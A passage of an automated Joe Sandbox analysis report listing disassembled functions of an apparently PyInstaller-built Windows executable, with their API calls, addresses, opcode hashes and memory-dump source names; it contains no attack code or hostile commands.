                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                              • Instruction ID: 27f1923d861f5aa6c08d6ba791f73f5243ecfc73ee9fb1d446c23abad981e651
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12215121A0C64246EF109B59B94526EA3A4EF867F0F600335EA6D83BE4DFBDD4858705

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetCurrentProcess.KERNEL32 ref: 00007FF62C0F8590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: OpenProcessToken.ADVAPI32 ref: 00007FF62C0F85A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.KERNELBASE ref: 00007FF62C0F85C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetLastError.KERNEL32 ref: 00007FF62C0F85D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.KERNELBASE ref: 00007FF62C0F8612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62C0F862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: CloseHandle.KERNEL32 ref: 00007FF62C0F8646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F9175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction ID: c931efda4175f5d1b75a5cabb4956b3dbd1db6a7913f30cea336931e4ebf479f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7217121A08B4245FF11AB10ED1A2EA6360FF89BA0F444031EE4DC3786DF3DD985C786
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(00000000,?,00007FF62C0F352C,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F7F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              • Opcode ID: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                                                                                                              • Instruction ID: da0028179664f049e22b4f1bffd33e0486af6989451cb5dd699f3388cc5b11e9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4131D221719AC149FE219B24EC107AA6354EF88BF0F440231EE6D87BC9DF2DE6858706
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D07C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D107
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction ID: 45eb129ed847f8951ade3926d75fe5aa1df73fbef9a1ac62f0aaf31205d19dae
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57910432F1865185FF60AF699C4A2BD2BA0BB45BA8F544139DE0E93A85CF3DD452C702
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction ID: 2216d76958980a5a3c8be71cf2823cfd0165be765e6261f22fe8a7438c1f4697
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1510372F042118AEF18CF689D6B6BC27A1BF54378F140235ED1E92AE5DF3DA412CA01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                                              • Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                              • Instruction ID: a4e455abd21e01ec38651cc347f7c3c61b6c5436560bd97bca91e9b64e193112
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F519D22E086418AFF10DF75D85A3BD37B5BB48BA8F148435DE0D87688DF38D4618306
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                              • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                              • Instruction ID: da74af7f78e454ec7ea6ea347ac7f67e776f14112e1a4fa69cf558a7a62c2ca1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7741A162E1878283EB10DB20995A3697360FBA53B4F109335EA9C83AD1DF7CA4F18705
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction ID: 8057bb0ef93e1debd6f95cbc3026028dcccac314c1d70477e347de350fcc6b8e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42318D21E0CA5749FE24AB299C273FD2681AF513A4F444034DE0EC72D7CF6EA884C25B
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                              • Instruction ID: d8cc47cb95edc8d5b6e99814b8124a7b7ae47c6e12d0ecac96a07b88ae943250
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04D09250B1874682EF183B786CAF17922556FADB31F152438CC1B86397EE6CA8698342
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                              • Instruction ID: 20db38ed7809fbb960a0fd1a024f07b8b62ca9bb570ee0efe15fd1e5edc95f29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E515921B0964186FF299E259C0A67E6681BF45BB4F188734ED7D877C6CF3CE4218782
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction ID: 3f47973824e9fa48d61ac8f515102cac9d0dc2d79e34c76bb2c5c3c73f37b923
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD11C471618A8181DE208B29AC59169A361BB46FF4F544331EEBD877D9CE7CD0258742
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C105957
                                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C10596D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                                                                                                              • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                              • Instruction ID: 27d3a395622cdf5dc4dcc8da4b465a5d3137a53a82e347f72bf959d8797b5173
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9111A07260CB5282EF648B18A81653AB7A0FB85B71F500236FA9DC19D8EF6CD064DF01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                              • Instruction ID: 18369c1a2045dee10bc2ce90c5ad1d520324d253498ed49af54fc09848dc215e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCE0CD50F5960243FF056BF55C8F17C12506FD8B61F444030DC0DC72D1DE2C68618312
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABC6
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABD0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction ID: e44467442982660bee0f7ba99827ccffcc611e9aefa720807015ca38e68369dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE21C311B5C68241FEA497659C9A37D2682AF85BB4F084239DE2EC77D6CEACE4614302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
